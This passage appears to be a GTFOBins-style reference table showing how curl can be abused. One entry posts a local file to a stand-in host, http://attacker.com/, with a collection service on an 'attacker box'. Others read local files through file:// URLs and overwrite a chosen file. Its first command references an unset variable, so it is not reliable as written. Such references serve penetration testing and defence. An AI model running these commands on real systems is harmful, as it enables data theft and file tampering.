description |
code |
Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Omit the `@` to send hard-coded data. |
URL=http://attacker.com/
LFILE=file_to_send
curl -X POST -d @$file_to_send $URL
|
|
|
|
description |
code |
The file path must be absolute. |
LFILE=/tmp/file_to_read
curl file://$LFILE
|
|
|
description |
code |
The file path must be absolute. |
LFILE=file_to_write
TF=$(mktemp)
echo DATA >$TF
curl "file://$TF" -o "$LFILE"
|
|
|
|
|